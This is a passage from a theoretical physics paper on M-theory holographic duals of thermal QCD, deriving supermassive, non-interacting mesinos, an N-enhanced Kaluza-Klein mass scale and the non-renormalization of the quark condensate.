_{2,n}(u). \tag{30}\] The solution of (28) is given by: \[\chi_{2,n}(u)=c_{1,n}M_{\frac{1}{2},1}\left(\frac{2\mathcal{A}_{\Theta_{2}^{ \prime}}u}{a_{1}}\right)+c_{2,n}W_{\frac{1}{2},1}\left(\frac{2\mathcal{A}_{ \Theta_{2}^{\prime}}u}{a_{1}}\right). \tag{31}\] One, therefore obtains: \[R_{2,n}(r\sim r_{0})=\frac{c_{2,n}a_{1}^{\frac{1}{2}-\frac{8_{ \Theta_{2}^{\prime}}}{2b_{1}}}}{\sqrt{2}\sqrt{\mathcal{A}_{\Theta_{2}^{\prime }}}}-\frac{(r-r_{0})a_{1}^{-\frac{\mathcal{B}_{\Theta_{2}^{\prime}}}{2b_{1}}} -\frac{3}{2}\left(a_{1}\mathcal{B}_{\Theta_{2}^{\prime}}c_{2,n}+\mathcal{A}_{ \Theta_{2}^{\prime}}^{2}(4c_{2,n}-8c_{1,n})\right)}{2\sqrt{2}\sqrt{\mathcal{A }_{\Theta_{2}^{\prime}}}}+\mathcal{O}\left((r-r_{0})^{3/2}\right).\] From (B5), one sees the absence of \(\mathcal{O}(R^{4})\) corrections in (32). One also sees from (32) that one can impose Dirichlet boundary condition at \(r=r_{0}\) (thereby setting \(c_{2}=0\)) for all and hence superheavy mesinos (\(M_{\rm Mesino}\)). For the BH background assuming \(\Gamma^{\underline{1}\underline{5}}\Theta_{2,0}=\Theta_{2,0},\ \Gamma^{ \underline{1}\underline{2}}\Theta_{2,0}=\Theta_{2,0}\), implying, \(\Gamma^{\underline{2}\underline{5}}\Theta_{2,0}=\Theta_{2,0}\), in the IR (i.e., near \(r=r_{h}\)), redefining \(u\equiv\sqrt{r-r_{h}}\), the solution of the EOM for \(R_{2,n}(u)\) is: \[R_{2,n}(u)=u^{\Lambda}\left[c_{1}U\left(\mu_{1},\mu_{2},\mu_{3}u\right)+c_{2}L _{-\mu_{1}}^{\mu_{2}-1}\left(\mu_{3}u\right)\right], \tag{33}\] where \(\Lambda,\mu_{1,2,3}\) are defined in (D1), and \(p=M_{\rm Mesino}\frac{r_{h}}{\sqrt{g_{s}N}}\)4 is contained in the \(\mathcal{O}\left(\frac{\beta}{N}\right)\) term in \(\mu_{3}\), which hence remains undetermined as \(\mathcal{O}\left(\frac{\beta}{N}\right)\) terms are dropped (see footnote **1**). One can show that \(\lim_{u\to 0}u^{\Lambda}c_{1}U\left(\mu_{1},\mu_{2},\mu_{3}u\right)\) is singular. One hence can not impose Dirichlet or Neumann boundary condition at \(r=r_{h}\) if \(c_{2}=0\). Now, Footnote 4: Glueball and meson masses at high temperatures were obtained respectively in [22] and [19] in units of \(\frac{r_{h}}{\sqrt{g_{s}N}}\). \[L_{-\mu_{1}}^{\mu_{2}-1}(u)=\frac{\Gamma(\mu_{2}-\mu_{1})}{\Gamma(1-\mu_{1}) \Gamma(\mu_{2})}-\frac{\Gamma(\mu_{2}-\mu_{1})}{\Gamma(-\mu_{1})\Gamma(\mu_{2 }+1)}u+\mathcal{O}(u^{2}), \tag{34}\] implying \(\lim_{u\to 0}u^{\Lambda}c_{2}L^{\mu_{2}-1}_{-\mu_{1}}(\mu_{3}u)=0\), implying the Dirichlet boundary condition is identically satisfied \(\forall M_{\rm Mesino}\) including very large \(M_{\rm Mesino}\). It is extremely non-trivial that the \(\mu_{i}\)s receive no \({\cal O}(\beta)\) corrections up to \({\cal O}\left(\frac{\beta}{N^{\mu_{i}}}\right),\ \alpha_{\mu_{i}}\geq 1\) - see (D1). The absence of \({\cal O}(R^{4})\) corrections is essentially a reflection of the fact that the \(SL(2,Z)\) completion of the effective \(R^{4}\) interaction terms in type IIB supergravity leads to an interesting non-renormalization theorem that forbids perturbative corrections beyond one loop in the zero-instanton sector [21]. What we now address in section 4 is how an \(N\)-enhancement (\(\equiv N\)-hancement) of the mass scale \(M_{\rm KK}=\frac{r_{0}}{\sqrt{4\pi g_{s}N}}\)[5] is obtained which therefore explains how one could obtain supermassive \(M_{\rm Mesino}\). ## 4 Generation of \(N\)-hanced Mass Scale for \(T<t_{c}\) In this section, starting from the \(D=11\) supergravity Einstein's field equations in the presence of four-form \(G\) fluxes of \({\cal M}\)-theory 5 - the first in (8) (also given in E) - we explicitly show the generation of an \(N\)-enhanced (\(\equiv\) "\(N\)-hanced") mass scale, thereby providing the mechanism of generation of supermassive mesinos. Footnote 5: One can show that “\(E_{\rm s}\)”-dependent terms in the same are subdominant as compared to the “\(J_{0}\)”-dependent terms [3]. Replacing the resolution parameter "\(a\)" of the blown-up \(S^{2}\) by \(a(r)\), substituting an ansatz: \(a(r)=b+c^{\beta^{0}}(r-r_{0})+\beta{\cal A}^{\beta}(r)\) into EOM\({}_{MN}\) in (8) (\(b\) being a "bare" resolution parameter) and estimating \(r_{0}\sim e^{-\kappa_{r_{0}}N^{1/3}}\)[23], near the \(\psi=2n\pi,n=0,1,2\)-coordinate patch, yields the following: 1. \[{\rm EOM}_{tt,x^{1}x^{1}/x^{2}x^{2}}:\ b\sim\kappa_{tt/x^{i}x^{i }/rr}N^{10/9}e^{-\kappa_{r_{0}}(N)\left(3+0.5\kappa_{r_{0}}(N)N^{1/3}\right)N ^{1/3}}r_{0};\] \[{\cal A}^{\beta}(r)\sim e^{\frac{c^{\beta}}{b}r}{\cal C}_{1},\] (35) with \(\kappa_{tt/x^{i}x^{i}/rr}\gg 1,\ \kappa_{r_{0}}(N=10^{2})=\frac{1}{{\cal O}(1)}-{ \cal O}(1)\), one obtains \(b\gg r_{0}\) and in principle an \(r_{0}\)-independent true bare resolution parameter propotional to \(\beta\); EOM\({}_{x^{3}x^{3}}\) near \(r=r_{0}\) does not constrain \(b\). 2. \[{\rm EOM}_{rr}:\ b\sim\tilde{\kappa}_{rr}N^{11/9}e^{\kappa_{r_{0}}N^{1/3}+1.25 \sqrt{1.57+0.55\log r_{0}-0.5\left(\log r_{0}\right)^{2}}}r_{0};\] (36) and for an appropriate \(\kappa_{r_{0}}\sim\frac{1}{{\cal O}(1)}:1.57+0.55\log r_{0}-0.5\left(\log r_{ 0}\right)^{2}>0\), and \(N\sim 10^{2}\), one regains the result for \(b\) as obtained in the first equation in (35). \(\frac{1323\sqrt[3]{N}\alpha_{\theta_{1}}^{2}}{256\alpha_{\theta_{2}}^{2}}-\frac{729 {g_{s}}^{3}M^{2}\left(\frac{1}{N}\right)^{6/5}{N_{f}}^{2}\left(2187\alpha_{ \theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2}\alpha_{\theta_{1}}^{3}+50 \alpha_{\theta_{2}}^{4}\right)a(r)^{3}\log^{3}(r_{0})\left(2rr_{0}\log(r_{0})a ^{\prime}(r)+a(r)(r_{0}-r)\log(r_{0})\right)}{16\pi^{3}r_{0}\alpha_{\theta_{1} }^{2}\alpha_{\theta_{2}}^{2}}=0,\] (37) whose solution is given by: \[a(r)=\left(\frac{864c_{1}{g_{s}}^{3}M^{2}{N_{f}}^{2}\Sigma e^{ \frac{2r}{6}}\log^{4}(r_{0})-98\pi^{3}N^{7/5}{r_{r}}{r_{0}}^{5}\alpha_{\theta _{1}}^{4}-49\pi^{3}N^{7/5}{r_{0}}^{6}\alpha_{\theta_{1}}^{4}}{{g_{s}}^{3}M^{2 }{N_{f}}^{2}r^{2}\Sigma\log^{4}(r_{0})}\right)^{1/4},\] \[\sim c_{1}\frac{e^{\frac{2r_{0}}{r_{0}}}}{\sqrt{r}}\sim\frac{c_{ 1}}{\sqrt{r_{0}}}\left[1+{\cal O}\left(\frac{(r-r_{0})^{2}}{r_{0}^{2}}\right) \right], \tag{38}\] where \(\Sigma\equiv\left(2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^ {2}\alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}\right)\). Recalling that \(r_{0}\sim e^{-\kappa_{r_{0}}N^{1/3}}\), we reinterpret (37) as \(a(r\sim r_{0})\sim c_{1}e^{\frac{3\kappa r_{0}N^{1/3}}{2}}r_{0}\), where for compatibity with (35) and (36), one may choose an \(N\)-dependent \(c_{1}\sim N^{(10-11)/9}e^{-\gamma N^{1/3}}\) for an appropriate \(\gamma\). 4. EOM\({}_{\theta_{1}\theta_{2}}\) \[\lambda_{3}a(r)^{3}\left(a(r)-a^{\prime}(r)\right)+\lambda_{1}a(r)^{4}+\frac{ \lambda_{2}\left(36a(r)^{2}\log(r_{0})+r_{0}\right)}{{r_{0}}^{2}-3a(r)^{2}}=0,\] (39) where, \[\lambda_{1} \equiv-\frac{243{g_{s}}^{3}M^{2}\left(\frac{1}{N}\right)^{11/10} N_{f}^{2}\left(2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}\right)\log^{4}(r_{0})}{8 \pi^{3}{r_{0}}^{4}\alpha_{\theta_{1}}\alpha_{\theta_{2}}^{3}},\] \[\lambda_{2} \equiv-\frac{1323N^{3/10}r_{0}\alpha_{\theta_{1}}^{3}}{256\alpha _{\theta_{2}}^{3}(\log N-9\log(r_{0}))},\] \[\lambda_{3} \equiv-\frac{729{g_{s}}^{3}M^{2}\left(\frac{1}{N}\right)^{11/10} N_{f}^{2}\left(2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}\right)\log^{4}(r_{0})}{8 \pi^{3}{r_{0}}^{3}\alpha_{\theta_{1}}\alpha_{\theta_{2}}^{3}}.\] (40) Defining, \[\Lambda\equiv\frac{2^{5/6}\sqrt{g_{s}}^{3}\sqrt{M}\sqrt[3]{N_{f}}r_{0}^{2} \sqrt[6]{2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}}\log^{\frac{25}{6}}(r_{0})} {9\sqrt[3]{7}\sqrt{3\pi}N^{7/30}\alpha_{\theta_{1}}^{2/3}},\] (41) \(a(r)\) is given by: \[\sqrt{\Lambda+\exp\left(\frac{2(r+\lambda_{3}c_{1})\left(\Lambda (\lambda_{1}+\lambda_{3})\left(2{r_{0}}^{2}-9\Lambda\right)+36\lambda_{2}\log (r_{0})\right)}{\lambda_{3}\Lambda\left({r_{0}}^{2}-3\Lambda\right)}\right)}\] \[\sim\sqrt{\Lambda}\sim\frac{\sqrt[4]{3}{g_{s}}^{3}\sqrt{M}\sqrt[6]{N _{f}}\sqrt[12]{2187\alpha_{\theta_{1}}^{6}+270\sqrt{6}\alpha_{\theta_{2}}^{2} \alpha_{\theta_{1}}^{3}+50\alpha_{\theta_{2}}^{4}}\log^{\frac{25}{12}}(r_{0})} {N^{7/60}\alpha_{\theta_{1}}^{1/3}}r_{0}.\] (42) 5. EOM\({}_{\theta_{1}x}\): \[b\sim N^{23/36}e^{\frac{1}{6}\kappa_{r_{0}}N^{1/3}\left(9\kappa_{r_{0}}N^{1/3}+ \log N\right)}r_{0}.\] (43) 6. EOM\({}_{\theta_{1}y}\): \[b\sim Ne^{\frac{3}{2}\kappa_{r_{0}}^{2}N^{2/3}}r_{0}.\] (44) 7. EOM\({}_{\theta_{2}x}\): \[b\sim\kappa_{\theta_{2}y}N^{10/9}e^{-\kappa_{r_{0}}^{2}N^{2/3}+4\kappa_{r_{0} }N^{1/3}}r_{0},\ \kappa_{\theta_{2}x}\gg 1.\] (45) 8. EOM\({}_{\theta_{2}y}\): \[b\sim N^{10/9}e^{-3\kappa_{r_{0}}N^{1/3}+\kappa_{r_{0}}^{2}N^{2/3}}r_{0}.\] (46) 9. EOM\({}_{\theta_{2}z}\): \[b\sim N^{10/9}e^{\kappa_{r_{0}}^{2}N^{2/3}-3\kappa_{r_{0}}N^{1/3}}r_{0}.\] (47) 10. EOM\({}_{xz/yy/yz/zz}\): \[b\sim N^{10/9}e^{\kappa_{r_{0}}^{2}N^{2/3}-6\kappa_{r_{0}}N^{1/3}}r_{0}.\] (48) 11. EOM\({}_{x^{10}x^{10}}\): \[b\sim N^{10/9}r_{0}.\] (49) We therefore see that the "bare resolution parameter" \(b\) given by: \[b\sim N^{1+\frac{1}{{\cal O}(1)}}r_{0};\quad a^{\beta}(r)={\cal C}e^{\frac{c_{ \rm linear}}{b}r},\ {\cal C}\equiv{\rm constant}. \tag{50}\] One hence can not obtain an \(r_{0}\)-independent "\(b\)". _One thus sees an \(N\)-hancement of the effective KK mass scale \(M_{KK}\) (from \(M_{KK}\) to \(M_{KK}^{\rm eff}\sim N^{1+\frac{1}{{\cal O}(1)}}M_{KK}\)) arising from the construction of SYZ type IIA mirror of the non-Kahler type IIB dual [2] of thermal QCD-like theories, as well as the generation of a one-parameter (\({\cal C}\)) family of \(r_{0}/M_{KK}\)-independent bare resolution parameter at \({\cal O}(R^{4})\) in the \({\cal M}\)-theory uplift involving a \(G_{2}\)-structure wherein \({\cal C}\) can be made appropriately large._ These are the pair of reasons for generating super-massive mesinos in the fermionic sector in the string/\({\cal M}\) theory duals of thermal QCD at finite \(N\) in [1], [3]. Non-Interacting Mesinos Given that we have seen in 3 that supermassive mesinos, unlike [8] (see [9]), _are_ permissible in the type IIA holographic dual [1] at intermediate coupling [3] of realistic thermal QCD-like theories, this already explains why mesinos have thus far not been observed near the EW scale. In this section, we will further show that mesino-mesino-single-(\(\rho/\pi\))meson interactions, unlike [8] (see [9]), vanish identically in the aforementioned type IIA holographic dual. Considering fluctuations of the vector mesons \(A_{\mu,r}\to A^{(0)}_{\mu,r}+\delta A_{\mu,r}\) with \(A^{(0)}_{\mu=t}\) being the only non-zero background value (see 3) which can be shown to be tunable so that \(|F^{(0)}_{rt}|\ll 1\), implying one need only consider terms linear in \(F^{(0)}_{\rm IIA}\)6 which are contained (recalling from section 3, \(\sqrt{-{\rm det}(i^{*}g^{\rm IIA}+{\cal F}^{(0)}_{\rm IIA})}\ll 1\), \({\cal F}_{IIA}=i^{*}B_{IIA}+F\) in the large-\(N\) limit) in : Footnote 6: Use is made of \(i^{*}B_{\alpha_{1}\alpha_{2}}=\delta^{[\theta_{1}}_{\alpha_{1}}\delta^{\theta _{2}]}_{\alpha_{2}}B_{\theta_{1}\theta_{2}}\) and consequently, \({\cal F}_{rt}=F_{rt}\). \[S^{f}_{D_{6}}=\frac{T_{D_{6}}}{2}\int d^{7}\xi e^{-\Phi^{\rm IIA}}\;\overline{ \Theta}\left(\frac{\Gamma^{\beta_{1}....\beta_{7}}{\cal F}^{(0)}_{\rm IIA}\ \beta_{6}\beta_{7}\Gamma_{\beta_{1}....\beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{ (10)}}{\sqrt{-{\rm det}(i^{*}g^{\rm IIA}+{\cal F}^{(0)}_{\rm IIA})}}\right)\Theta. \tag{51}\] Considering fluctuations in the background gauge field in (51) and retaining terms linear in the same yields: \[\delta S^{f}_{D_{6}}\sim T_{D_{6}}\int_{\Sigma_{(7)}}d^{4}xdrd\theta_{2}d \tilde{y}e^{-\Phi^{\rm IIA}}\overline{\Theta}\left(\frac{4\Gamma^{\beta_{1}.... \beta_{7}}\delta{\cal F}^{\rm IIA}_{\beta\theta\eta}\Gamma_{\beta_{1}.... \beta_{5}}{}^{\gamma}D_{\gamma}\Gamma_{(10)}}{\sqrt{-{\rm det}(i^{*}g^{\rm IIA }+{\cal F}^{(0)}_{\rm IIA})}}\right)\Theta. \tag{52}\] The next step is to perform the KK expansion of \(\delta{\cal F}^{\rm IIA}_{\alpha\beta}\) and decompose spinors along \(M_{4}\) and internal directions, and by integrating over the \(\theta_{2}\) and \(\tilde{y}\) we will get mesino-mesino-meson interaction action with couplings given in terms of radial integrals of the radial profile functions of the mesino and mesons. The usual KK expansion ansatz [5] is: \[\delta A_{\mu}(x^{\mu},r)=\sum_{n=1}^{\infty}\rho^{(n)}_{\mu}(x)\psi_{n}(r), \tag{53}\] and \[\delta A_{r}(x^{\mu},r)=\sum_{n=0}^{\infty}\pi^{(n)}(x)\phi_{n}(r), \tag{54}\] implies \[\delta F_{\mu\nu}=\sum_{n=1}^{\infty}\tilde{F}^{(n)}_{\mu\nu}(x)\psi_{n}(r), \tag{55}\] and \[\delta F_{\mu r}=\sum_{n=0}^{\infty}\partial_{\mu}\pi^{(n)}(x^{\mu})\phi_{n}( r)-\sum_{n=1}^{\infty}\rho^{(n)}_{\mu}(x)\dot{\psi}_{n}(r). \tag{56}\] We will keep the \(n=1\) term for the vector fluctuation and \(n=0\) for the \(A_{r}(x^{\mu},r)\); hence, the degrees of freedom are \(\rho\) vector meson and \(\pi\) meson. Using the KK decomposition of \(\delta F_{\mu\nu}\) and \(\delta F_{\mu r}\), (52) simplified as follows: \[S_{D_{6}}^{int} \sim T_{D_{6}}\int_{\Sigma_{(7)}}\Biggl{[}\frac{e^{-\Phi^{\rm IIA}}}{ \sqrt{-{\rm det}(i^{*}g^{\rm IIA}+{\cal F}_{\rm IIA}^{(0)})}}\overline{\Theta} \Biggl{(}\Gamma^{\beta_{1}.....\beta_{5}\mu\nu}\delta\tilde{F}_{\mu\nu}\psi(r) \Gamma_{\beta_{1}.....\beta_{5}}{}^{\gamma}D_{\gamma} \tag{57}\] \[+\Gamma^{\beta_{1}.....\beta_{5}\mu r}\left(\partial_{\mu}\pi(x^{ \mu})\phi(r)-\rho_{\mu}(x^{\mu})\dot{\psi}(r)\right)\Gamma_{\beta_{1}..... \beta_{5}}{}^{\gamma}D_{\gamma}\Biggr{)}\Theta\Biggr{]}.\] Using the decomposition of the ten-dimensional gamma matrices [24]: \[\Gamma^{\underline{A}=\underline{t},x^{1,2,3},\underline{r}}=\sigma_{y} \otimes{\bf 1}_{4}\otimes\gamma^{\underline{A}},\quad\Gamma^{\underline{a}=5, \ldots,9}=\sigma_{x}\otimes\gamma^{\underline{a}}\otimes{\bf 1}_{4}, \tag{58}\] with \[\left\{\gamma^{\underline{A}},\gamma^{\underline{B}}\right\}=-2 \eta^{\underline{AB}},\] \[\left\{\gamma^{\underline{a}},\gamma^{\underline{b}}\right\}=-2 \delta^{\underline{ab}}. \tag{59}\] The ten-dimensional chirality matrix is defined as: \[\Gamma^{(10)}=\sigma_{z}\otimes{\bf 1}_{4}\otimes{\bf 1}_{4}. \tag{60}\] The positive-chirality ten-dimensional \(\Theta\) can hence be decomposed into \[\Theta=\uparrow\otimes\chi_{M_{5}(x^{0,1,2,3},r)}\otimes\psi_{\tilde{M}_{5}( \theta_{1,2},\phi_{1,2},\psi)}, \tag{61}\] where \(\psi_{\tilde{M}_{5}(\theta_{1,2},\phi_{1,2},\psi)}\) further splits into \(\psi_{\tilde{M}_{5}}=\psi_{S_{\rm squashed}^{2}}\otimes\psi_{S_{\rm squashed}^{3}}\). Looking at the second fermionic bilinear in (57): \[\bar{\Theta}\Gamma^{\beta_{1}...\beta_{5}tr}\Gamma_{\beta_{1}...\beta_{5}}{}^ {\gamma}D_{\gamma}\Theta(\beta_{i=1,...,5}=x^{0,1,2,3},\theta_{2},\tilde{y}; \ \gamma=t,r)\sim\bar{\Theta}\Gamma^{t}D_{r}\Theta+\bar{\Theta}\Gamma^{r}D_{t}\Theta. \tag{62}\] Now, the non-vanishing \(\bar{\Theta}\Gamma^{\underline{X}_{1}...\underline{X}_{p}}\Theta\) involving Majorana-Weyl spinor \(\Theta\) requires \(p=3,7\)[9]. One can further show that the most dominant spin-connection component of the type \(\omega_{r}^{\underline{ab}}\) is \(\omega_{r}^{\overline{7}9}\) and only non-vanishing spin-connection component of the type \(\omega_{t}^{\underline{ab}}\) is \(\omega_{t}^{\underline{x}^{0}r}\). Therefore, using (58): \[\bar{\Theta}\Gamma^{\beta_{1}...\beta_{5}tr}\Gamma_{\beta_{1}...\beta_{5}}{}^ {\gamma}D_{\gamma}\Theta\sim\bar{\Theta}\Gamma^{\underline{t}}\omega_{r}^{ \overline{7}9}\Gamma^{\overline{7}9}\Theta\propto\langle\uparrow|\sigma_{y}| \uparrow\rangle=0. \tag{63}\] Also, \[\overline{\Theta}\Gamma^{\beta_{1}.....\beta_{5}\mu\nu}\delta\tilde{F}_{\mu \nu}\psi(r)\Gamma_{\beta_{1}.....\beta_{5}}{}^{\gamma}D_{\gamma}\Theta=0, \tag{64}\] as \(\mu,\nu\in x^{1,2,3}\) and thus using (58): \[\overline{\Theta}\Gamma^{kx^{0}r\theta_{2}\tilde{y}\tilde{y}j}\delta\tilde{F} _{ij}\psi(r)\Gamma_{kx^{0}r\theta_{2}\tilde{y}}{}^{i}D_{i}\Theta(i\neq j\neq k =x^{1,2,3})\sim\delta\tilde{F}_{ij}\overline{\Theta}\Gamma^{ij}\Gamma^{l} \partial_{l}\Theta(l\neq k)\ \propto\langle\uparrow|\sigma_{y}|\uparrow\rangle=0. \tag{65}\] Hence, no mesino-mesino-\(\rho/\pi\)-meson vertex is generated. Together with what was argued earlier that one could have a supermassive mesino, this suggests the "WISP"(Weakly Interacting Supermassive Particle)y nature of the non-supersymmetric mesino, and consequently resolves the tension between actual QCD and top-down holographic QCD [9]. Top-Down \(m_{\rm quark}\langle\bar{q}q\rangle\) Non-Renormalization up to \({\cal O}(R^{4})\) The \({\cal O}(R^{4})\) corrections to the \({\cal M}\)-theory dual's metric are vanishing small in the UV [25]. The EOM of the flavor \(D6\)-branes' embedding, \(\tilde{z}=\tilde{z}(r)\) in the IR arising from the DBI action for the flavor \(D6\)-branes with world volume \(\Sigma_{7}\left(S^{1}_{t}\times\mathbb{R}^{3}\times\mathbb{R}_{>0}\times S^{2} _{\rm squashed}\right)\) embedded via \(i:\Sigma_{7}\hookrightarrow S^{1}_{t}\times\mathbb{R}^{3}\times_{w}M_{6}\) [\(w\equiv\) warped product] effected by \(\tilde{z}=\tilde{z}(r)\) in a non-Kahler warped squashed resolved conifold \(M_{6}\) in the type IIA mirror of the UV-complete type IIB dual [2] of thermal QCD-like theories, using the induced metric on flavor \(D6\)-branes of (23), NS-NS \(B^{\rm IIA}\) of (22), can be shown to yield: \(\tilde{z}=\)constant, inclusive of \({\cal O}(\beta)\) corrections. The DBI action in the UV is given by (disregarding overall \(r\)-independent factors, and hence the \(\sim\)): \[{\cal L}^{\rm D6}_{\rm DBI}\sim\frac{r^{2}\sqrt{\frac{4\pi\sqrt{g_{s}}r^{2} \alpha_{\theta_{2}}^{3}(6a^{2}+r^{2})}{9a^{2}+r^{2}}+3\sqrt{3\pi}N^{2/5}\left(r ^{4}-{r_{h}}^{4}\right)\tilde{z}^{\prime}(r)^{2}}}{{g_{s}}^{3/4}}, \tag{66}\] and consequently the \(\tilde{z}(r)\) EOM: \(\frac{\delta{\cal L}^{\rm D6}_{\rm DBI}}{\delta\tilde{z}^{\prime}(r)}={\cal K}\) (constant) in the UV yields: \[\tilde{z}^{\prime}(r)=\frac{{\cal C}}{r^{5}}, \tag{67}\] \({\cal C}\) being a constant (subsuming \(g_{s}\)- and \(N\)-dependent factors). One hence obtains7: Footnote 7: \(\tilde{\zeta}_{2}=\frac{{\cal C}}{4}\). \[\tilde{z}(r)={\cal C}_{1}-\frac{\tilde{\cal C}_{2}}{r^{4}}\stackrel{{ r\in{\rm UV}}}{{\longrightarrow}}{\cal C}_{1}. \tag{68}\] As \(\tilde{z}(r)\) is dimensionless, \({\cal C}_{1}\) will hence also be so, and \({\cal C}_{2}\) will have a mass dimension of four (in units of \({\cal R}_{D5/\overline{D5}}=D5-\overline{D5}\)-separation). By looking at fluctuations: \(\tilde{z}\rightarrow\tilde{z}+\delta\tilde{z}\) in the DBI action (no mass term \((\delta\tilde{z})^{2}\) is generated) one can show that in the UV and in the \(\psi=2n\pi,n=0,1,2\)-coordinate patches and by working near, e.g., \((\theta_{1},\theta_{2})=\left(\frac{\alpha\theta_{1}}{N^{1/5}},\frac{\alpha \theta_{2}}{N^{3/10}}\right)\)[12], [23] (consistent with the \(\mu_{\rm Ouyang}|\ll 1\)-limit of the flavor \(D7\)-branes in the parent type IIB dual [2]): \[\delta\tilde{z}\stackrel{{{\rm UV}}}{{\longrightarrow}}c_{1}+ \frac{{\cal C}_{2}}{r^{4}}+{\cal O}\left(\left(\frac{{\cal C}_{2}}{r}\right)^{ 12}\right). \tag{69}\] Again, we see that the mass dimension of the coefficient \({\cal C}_{2}\) of \(\frac{1}{r^{4}}\) is four (and \(c_{1}\) is dimensionless). Given that one obtains an \(AdS_{5}\) in the UV, the coefficient of \(\frac{1}{r^{4}}\) for the massless fluctuation \(\delta\tilde{z}\) is identified with a chiral condensate [26], we conjecture that \({\cal C}_{2}\) is the top-down holographic analog of the mass-dimension-four \(m_{q}\langle\bar{q}q\rangle\). As the \({\cal O}(R^{4})\) corrections are vanishingly small in the UV [5], \(c_{1}\) and \({\cal C}_{2}\) receive no \({\cal O}(R^{4})\) corrections. This is the top-down holographic analog of the RG-invariance of \(m_{q}\langle\bar{q}q\rangle\)[27]. Universality in Particle Wave Functions in the IR An intriguing universality in the wave functions of the following particle spectroscopies is noticed. **Glueballs**[22]: * \(0^{-+}\) glueball: The EOM of the type IIA RR \(A\) fluctuation (to which tr\(F\wedge\tilde{F}\) couples via the type IIA \(D4\)-brane with world volume \(\Sigma_{1,4}\)) term WZ term \(\int_{\Sigma_{1,4}}A\wedge\)tr\(F\wedge\tilde{F}\)) \(\partial_{\nu}\left(\sqrt{g^{\rm IIA}}g^{\mu\sigma}_{\rm IIA}g^{\nu\rho}_{\rm IIA }\left(\partial_{[\sigma}A_{\rho]}\right)\right)=0\) (where \(\mu,\nu,...=a(\equiv 0,1,2,3),r,\alpha(\equiv 5,...,9)\) and it was assumed \(A_{\mu}=\delta^{\theta_{\mu}}_{\mu}a_{\theta_{2}}(r)e^{ik\cdot x},k^{2}=-m^{2}\) as the fluctuation about the type IIA \(A_{1}\) that was worked out in [1]). * \(0^{--}\) glueball: The EOM for the fluctuation in the type IIB \(A_{MN}=B_{MN}+iC_{MN}\) (that figures in the Weiss-Zumino term \(A^{\mu\nu}d^{abc}{\rm Tr}\left(F^{a}_{\mu\rho}F^{b\ \rho}_{\lambda}F^{c\ \lambda}_{\nu}\right)\)), \(\delta A^{MN}=\delta^{M}_{2}\delta^{N}_{2}\delta A_{23}\), \(\partial_{\mu}\left(\sqrt{-g}g^{22}g^{33}g^{\mu\nu}\partial\delta A_{23}\right)=0\). * \(1^{++}\) glueball: The EOM for the radial profile function of the vector-type \({\cal M}\)-theory metric perturbation \(h_{ti}=h_{it}=g_{x^{1}x^{1}}G(r)e^{ikx^{1}},i=x^{2},x^{3}:R^{(1)}_{\mu\nu} \approx 0,\ R^{(1)}_{\mu\nu}\) denoting the first-order fluctuations in the Ricci tensor as a consequence of linear metric perturbations. **Mesons**[19]: Working with the redefined radial variable \(Z:r=r_{h}e^{Z}\), after integrating out the blown-up \(S^{2}_{\rm squashed}\) in the DBI action of the flavor type IIA \(D6\)-branes and KK reduction of the gauge field \(A_{\mu}(x^{\mu},Z)=\sum_{n=1}B^{(n)}_{\mu}(x^{\mu})\alpha^{\{\mu\}}_{n}(Z),\mu =t,x^{i=1,2,3}\), the terms in the DBI action quadratic in the gauge field fluctuations are: \(\int d^{4}xdZ\left(\mathcal{V}_{2}(Z)F^{(n)}_{\mu\nu}F^{\mu\nu}_{(n)}\alpha^{ \{\mu\}}_{m}(Z)\alpha^{\{\mu\}}_{n}(Z)+\mathcal{V}_{1}(Z)B^{(m)}_{\mu}B^{(n)} _{\nu}\dot{\alpha}^{\{\mu\}}_{m}\dot{\alpha}^{\{\mu\}}_{n}\right)\). The EOM for the radial profile \(\alpha^{\{i\}}_{m}(Z)\) is \(:\frac{d}{dZ}\left(\mathcal{V}_{1}(Z)\dot{\alpha}^{\{i\}}_{m}\right)+2\mathcal{ V}_{2}(Z)\mathcal{M}^{\{i\}}_{(m)}\alpha^{\{i\}}_{m}=0\), where \(\mathcal{V}_{1}(Z)=e^{-\Phi^{IIA}}\sqrt{hg}g^{ZZ}\sqrt{\det_{2,\tilde{y}}\left( i^{*}g+B\right)}\sqrt{\det_{2,\tilde{y}}\left(i^{*}g+B\right)}\) and \(\mathcal{V}_{2}(Z)=e^{-\Phi^{IIA}}\frac{h}{2}\sqrt{\det_{2,\tilde{y}}\left(i^ {*}(g+B)\right)}\sqrt{\det_{2^{1,3},|Z|}(i^{*}g)}\). The solution of \(\alpha^{\{i\}}\) is given in terms of the Tricomi Hypergeometric and associated Laguerre functions. **Graviton**[28]: In the context of obtaining the Page curve of an eternal black hole from the \({\cal M}\)-theory dual containing a black-hole in the ETW(End of The World)-"brane" (a hypersurface \(AdS^{\infty}_{4}\times_{w}M_{6},\times_{w}\) implying a warped product, with \(G_{4}\) fluxes threading a homologous sum of four-cycles \(S^{3}_{\rm squashed}\times[0,1]\) and \(S^{2}_{\rm squashed}\times S^{2}_{\rm squashed}\) in \(M_{6}=M_{5}(\theta_{1,2},\phi_{1,2},\psi)\times S^{1}(x^{10})\hookrightarrow M ^{SU(4)/Spin(7)}_{8}(t,r,\theta_{1,2},\phi_{1,2},\psi,x^{10})\), with a finite "tension" coupled to a non-conformal QCD bath in the doubly holographic approach, the massless graviton wavefunction with the graviton localized on the ETW-brane trapped in a "volcano"-like potential, is given in terms of the Tricomi Hypergeometric and associated Laguerre functions. Solutions to the EOMs for the aforementioned field fluctuations/radial profile function are given in terms of the Tricomi Hypergeometric and associated Laguerre functions. The reason is that the relevant near-\(r_{h}\) EOMs for \(0^{-+},0^{--},1^{++}\)-glueballs [22], and the radial profile function of the graviton wave function [28] are _all_ of the type: \[(r-r_{h})\xi^{\prime\prime}(r)+\left(b+c(r-r_{h})\right)\xi^{\prime}(r)+(f+(r-r _{h})G)\xi(r)=0, \tag{70}\] whose solution is given as: 